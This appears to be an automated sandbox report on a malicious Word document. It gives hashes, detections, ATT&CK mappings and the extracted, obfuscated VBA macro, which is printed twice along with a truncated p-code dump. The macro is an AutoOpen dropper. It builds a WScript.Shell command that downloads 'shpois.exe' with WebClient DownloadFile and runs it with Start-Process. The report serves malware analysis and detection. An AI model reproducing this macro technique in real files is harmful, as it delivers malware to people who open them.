Office (OLE) malware analysis — malicious · 7c6664a174498259

MALICIOUS

Office (OLE)

78.0 KB Created: 2017-02-19 14:23:00 Authoring application: Microsoft Office Word First seen: 2017-12-08

MD5: 7a2c905b660647a2609fe11e26d2e673 SHA-1: c2a02bed5aad59e486ab69d072004373b39fba56 SHA-256: 7c6664a17449825922cce2d8e8cbc068a650c5de5f164f4f7caf46c11ea4961d

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The file contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The script uses CreateObject to instantiate 'WScript.Shell' and then executes a command that appears to download and run a file named 'shpois.exe'. This indicates the document is a dropper for a secondary payload.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6388439-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6388439-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5555 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5555 bytes
SHA-256: `74233ce7a2d2eac849c11027ff571fd5b8da24d73f4555394afd9104409b99ba`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "zericaniya" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() MEOEJjUUehw = odjojr.oejiwer knJnjeJEb = "W" Set PKpKEoe = CreateObject( _ "" + knJnjeJEb + "scrip" + MEOEJjUUehw) PKpKEoe.Run MmOeoiwieUr(pdfjtry), 0 End Sub Function iJEuEHfccE() Dim mvoHHIHpe nvsiheUGHr = ojvsjiJIhri ojoIEihfi = mvoHHIHpe + nvsiheUGHr VoIeiHELejt = pkejrt.jsojgd mNEiHEfHWr = VoIeiHELejt + "ect " iEHHbsBr = odjojr.pdkroy MoJEhfHWfE = pkejrt.omdsirj Dim noEIhhuEUt ojIehfIi = oushejihf + ojeifhOsae PKeFJINfnJE = "S" + iEHHbsBr + "eb" + MoJEhfHWfE + "t)" iJEuEHfccE = mNEiHEfHWr + PKeFJINfnJE End Function Attribute VB_Name = "KHdryy" Function MmOeoiwieUr(pdfjtry) KJeUEHgEt = odjojr.Caption + "loadFile" mOEjjHE = "('" + nsiiueut.vnsoie + nsiiueut.ivjsie + nsiiueut.misdjis + nsiiueut.uhsueh + nsiiueut.ojsjeit + "','%" + odjojr.pkOe + "%\shpois.exe');" PKDfOJEOJf = "tar" MoJEfhHEoW = "S" + PKDfOJEOJf + "t-Process '%" + odjojr.pkOe + "%\shpois.exe';" KdvUUEghEit = KJeUEHgEt + mOEjjHE + MoJEfhHEoW niEhfEWifJ = pkejrt.Caption + pkejrt.osjiet + pkejrt.mfteyr LfOWjWIrJWr = niEhfEWifJ + zericaniya.iJEuEHfccE + KdvUUEghEit MmOeoiwieUr = odjojr.mosiet + " /c " + LfOWjWIrJWr + "" End Function Attribute VB_Name = "odjojr" Attribute VB_Base = "0{A8F01310-F89F-43E9-818F-DC5D24BB68FE}{AE4084A6-E80E-4A34-B4AC-0A36C2CC1255}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "pkejrt" Attribute VB_Base = "0{DF94BA57-7683-4356-AC8A-590B427370C6}{69986F3D-C91A-4ECE-929C-33AAEC7F29CE}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "nsiiueut" Attribute VB_Base = "0{17804BE7-04DC-4560-AF0B-E6DCF1B19664}{81B5E1C5-634F-47FD-B7A1-0B6C52A16989}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False ' Processing file: /opt/analyzer/scan_staging/28a69fe70404437b95585ec032db4bff.bin ' =============================================================================== ' Module streams: ' Macros/VBA/zericaniya - 2457 bytes ' Line #0: ' FuncDefn (Sub knJnjeJEb()) ' Line #1: ' Ld CreateObject ' MemLd Run ' St PKpKEoe ' Line #2: ' LitStr 0x0001 "W" ' St MmOeoiwieUr ' Line #3: ' LineCont 0x0004 05 00 00 00 ' SetStmt ' LitStr 0x0000 "" ' Ld MmOeoiwieUr ' Add ' LitStr 0x0005 "scrip" ' Add ' Ld PKpKEoe ' Add ' ArgsLd iJEuEHfccE 0x0001 ' Set pdfjtry ' Line #4: ' Ld ojvsjiJIhri ' ArgsLd nvsiheUGHr 0x0001 ' LitDI2 0x0000 ' Ld pdfjtry ' ArgsMemCall mvoHHIHpe 0x0002 ' Line #5: ' EndSub ' Line #6: ' FuncDefn (Function ojoIEihfi(id_FFFE As Variant)) ' Line #7: ' Dim ' VarDefn VoIeiHELejt ' Line #8: ' Ld jsojgd ' St pkejrt ' Line #9: ' Ld VoIeiHELejt ' Ld pkejrt ' Add ' St mNEiHEfHWr ' Line #10: ' Ld pdkroy ' MemLd MoJEhfHWfE ' St iEHHbsBr ' Line #11: ' Ld iEHHbsBr ' LitStr 0x0004 "ect " ' Add ' St omdsirj ' Line #12: ' Ld CreateObject ' MemLd ojIehfIi ' St noEIhhuEUt ' Line #13: ' Ld pdkroy ' MemLd ojeifhOsae ' St oushejihf ' Line #14: ' Dim ' VarDefn PKeFJINfnJE ' Line #15: ' Ld KJeUEHgEt ' Ld Caption ' Add ' St KHdryy ' Line #16: ' LitStr 0x0001 "S" ' Ld noEIhhuEUt ' Add ' LitStr 0x0002 "eb" ' Add ' Ld oushejihf ' Add ' LitStr 0x0002 "t)" ' Add ' St mOEjjHE ' Line #17: ' Ld omdsirj ' Ld mOEjjHE ' Add ' St ojoIEihfi ' Line #18: ' EndFunc ' Line #19: ' Macros/VBA/KHdryy - 1922 bytes ' Line #0: ' Fu ... (truncated)

SHA-256: 74233ce7a2d2eac849c11027ff571fd5b8da24d73f4555394afd9104409b99ba

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "zericaniya"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
MEOEJjUUehw = odjojr.oejiwer
knJnjeJEb = "W"
Set PKpKEoe = CreateObject( _
"" + knJnjeJEb + "scrip" + MEOEJjUUehw)
PKpKEoe.Run MmOeoiwieUr(pdfjtry), 0
End Sub
Function iJEuEHfccE()
Dim mvoHHIHpe
nvsiheUGHr = ojvsjiJIhri
ojoIEihfi = mvoHHIHpe + nvsiheUGHr
VoIeiHELejt = pkejrt.jsojgd
mNEiHEfHWr = VoIeiHELejt + "ect "
iEHHbsBr = odjojr.pdkroy
MoJEhfHWfE = pkejrt.omdsirj
Dim noEIhhuEUt
ojIehfIi = oushejihf + ojeifhOsae
PKeFJINfnJE = "S" + iEHHbsBr + "eb" + MoJEhfHWfE + "t)"
iJEuEHfccE = mNEiHEfHWr + PKeFJINfnJE
End Function


Attribute VB_Name = "KHdryy"
Function MmOeoiwieUr(pdfjtry)
KJeUEHgEt = odjojr.Caption + "loadFile"
mOEjjHE = "('" + nsiiueut.vnsoie + nsiiueut.ivjsie + nsiiueut.misdjis + nsiiueut.uhsueh + nsiiueut.ojsjeit + "','%" + odjojr.pkOe + "%\shpois.exe');"
PKDfOJEOJf = "tar"
MoJEfhHEoW = "S" + PKDfOJEOJf + "t-Process '%" + odjojr.pkOe + "%\shpois.exe';"
KdvUUEghEit = KJeUEHgEt + mOEjjHE + MoJEfhHEoW
niEhfEWifJ = pkejrt.Caption + pkejrt.osjiet + pkejrt.mfteyr
LfOWjWIrJWr = niEhfEWifJ + zericaniya.iJEuEHfccE + KdvUUEghEit
MmOeoiwieUr = odjojr.mosiet + " /c  " + LfOWjWIrJWr + ""
End Function

Attribute VB_Name = "odjojr"
Attribute VB_Base = "0{A8F01310-F89F-43E9-818F-DC5D24BB68FE}{AE4084A6-E80E-4A34-B4AC-0A36C2CC1255}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "pkejrt"
Attribute VB_Base = "0{DF94BA57-7683-4356-AC8A-590B427370C6}{69986F3D-C91A-4ECE-929C-33AAEC7F29CE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "nsiiueut"
Attribute VB_Base = "0{17804BE7-04DC-4560-AF0B-E6DCF1B19664}{81B5E1C5-634F-47FD-B7A1-0B6C52A16989}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' Processing file: /opt/analyzer/scan_staging/28a69fe70404437b95585ec032db4bff.bin
' ===============================================================================
' Module streams:
' Macros/VBA/zericaniya - 2457 bytes
' Line #0:
' 	FuncDefn (Sub knJnjeJEb())
' Line #1:
' 	Ld CreateObject 
' 	MemLd Run 
' 	St PKpKEoe 
' Line #2:
' 	LitStr 0x0001 "W"
' 	St MmOeoiwieUr 
' Line #3:
' 	LineCont 0x0004 05 00 00 00
' 	SetStmt 
' 	LitStr 0x0000 ""
' 	Ld MmOeoiwieUr 
' 	Add 
' 	LitStr 0x0005 "scrip"
' 	Add 
' 	Ld PKpKEoe 
' 	Add 
' 	ArgsLd iJEuEHfccE 0x0001 
' 	Set pdfjtry 
' Line #4:
' 	Ld ojvsjiJIhri 
' 	ArgsLd nvsiheUGHr 0x0001 
' 	LitDI2 0x0000 
' 	Ld pdfjtry 
' 	ArgsMemCall mvoHHIHpe 0x0002 
' Line #5:
' 	EndSub 
' Line #6:
' 	FuncDefn (Function ojoIEihfi(id_FFFE As Variant))
' Line #7:
' 	Dim 
' 	VarDefn VoIeiHELejt
' Line #8:
' 	Ld jsojgd 
' 	St pkejrt 
' Line #9:
' 	Ld VoIeiHELejt 
' 	Ld pkejrt 
' 	Add 
' 	St mNEiHEfHWr 
' Line #10:
' 	Ld pdkroy 
' 	MemLd MoJEhfHWfE 
' 	St iEHHbsBr 
' Line #11:
' 	Ld iEHHbsBr 
' 	LitStr 0x0004 "ect "
' 	Add 
' 	St omdsirj 
' Line #12:
' 	Ld CreateObject 
' 	MemLd ojIehfIi 
' 	St noEIhhuEUt 
' Line #13:
' 	Ld pdkroy 
' 	MemLd ojeifhOsae 
' 	St oushejihf 
' Line #14:
' 	Dim 
' 	VarDefn PKeFJINfnJE
' Line #15:
' 	Ld KJeUEHgEt 
' 	Ld Caption 
' 	Add 
' 	St KHdryy 
' Line #16:
' 	LitStr 0x0001 "S"
' 	Ld noEIhhuEUt 
' 	Add 
' 	LitStr 0x0002 "eb"
' 	Add 
' 	Ld oushejihf 
' 	Add 
' 	LitStr 0x0002 "t)"
' 	Add 
' 	St mOEjjHE 
' Line #17:
' 	Ld omdsirj 
' 	Ld mOEjjHE 
' 	Add 
' 	St ojoIEihfi 
' Line #18:
' 	EndFunc 
' Line #19:
' Macros/VBA/KHdryy - 1922 bytes
' Line #0:
' 	Fu
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.